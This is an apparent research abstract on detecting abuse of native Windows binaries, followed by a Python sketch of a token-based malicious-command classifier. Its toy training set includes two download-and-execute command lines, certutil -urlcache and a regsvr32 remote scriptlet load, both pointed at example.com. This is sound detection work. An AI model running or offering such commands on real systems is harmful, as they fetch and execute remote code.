Living-off-the-Land is an evasion technique in which attackers abuse native binaries to achieve malicious ends. Because these binaries are usually legitimate system files, such abuse is difficult to detect and is often missed by modern anti-virus software. This paper proposes a novel abuse detection algorithm that operates on raw command strings. First, natural language processing techniques such as regular expressions and one-hot encoding are used to encode the command strings as numerical token vectors. Next, supervised learning techniques are employed to learn the malicious patterns in the token vectors and ultimately predict each command's label. Finally, the model is evaluated using statistics from the training phase and, in a virtual environment, compared against existing anti-virus products such as Windows Defender on its effectiveness at detecting new commands.
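The pipeline described above (regular-expression tokenization, one-hot encoding, supervised classification) can be illustrated with a minimal sketch. This is not the paper's implementation: the token pattern, the four toy commands and their labels, and the choice of a perceptron as the supervised learner are all assumptions made for illustration, and each command is represented by OR-ing the one-hot vectors of its tokens into a single fixed-length vector.

```python
import re

# Assumed token pattern (not from the paper): runs of letters, digits, '_', '.', '-'.
TOKEN_RE = re.compile(r"[a-z0-9_.\-]+")

def tokenize(command):
    """Split a raw command string into lowercase tokens."""
    return TOKEN_RE.findall(command.lower())

def build_vocab(commands):
    """Map every token seen in training to a fixed vector index."""
    tokens = sorted({t for c in commands for t in tokenize(c)})
    return {tok: i for i, tok in enumerate(tokens)}

def encode(command, vocab):
    """OR together the one-hot vectors of the command's tokens.
    Tokens outside the vocabulary are ignored."""
    vec = [0] * len(vocab)
    for tok in tokenize(command):
        if tok in vocab:
            vec[vocab[tok]] = 1
    return vec

def predict(weights, bias, vec):
    """Return 1 (malicious) if the linear score is positive, else 0 (benign)."""
    score = sum(w * x for w, x in zip(weights, vec)) + bias
    return 1 if score > 0 else 0

def train_perceptron(samples, n_features, epochs=20):
    """Perceptron learning rule; stands in for the paper's unspecified model."""
    weights, bias = [0] * n_features, 0
    for _ in range(epochs):
        for vec, label in samples:
            error = label - predict(weights, bias, vec)
            if error:
                weights = [w + error * x for w, x in zip(weights, vec)]
                bias += error
    return weights, bias

# Hypothetical toy data: (command, label) with 1 = malicious, 0 = benign.
TRAINING = [
    ("certutil.exe -urlcache -split -f http://example.com/payload.exe payload.exe", 1),
    ("certutil.exe -hashfile report.pdf sha256", 0),
    ("regsvr32.exe /s /n /u /i:http://example.com/file.sct scrobj.dll", 1),
    ("regsvr32.exe /s shell32.dll", 0),
]

vocab = build_vocab(cmd for cmd, _ in TRAINING)
samples = [(encode(cmd, vocab), label) for cmd, label in TRAINING]
weights, bias = train_perceptron(samples, len(vocab))

def classify(command):
    """Predict the label of a previously unseen command string."""
    return predict(weights, bias, encode(command, vocab))
```

Calling `classify("certutil.exe -urlcache -f http://example.com/x.exe x.exe")` encodes the new command with the training vocabulary and scores it with the learned weights. A realistic system would need far more labeled data and a held-out evaluation, as the abstract's final step suggests.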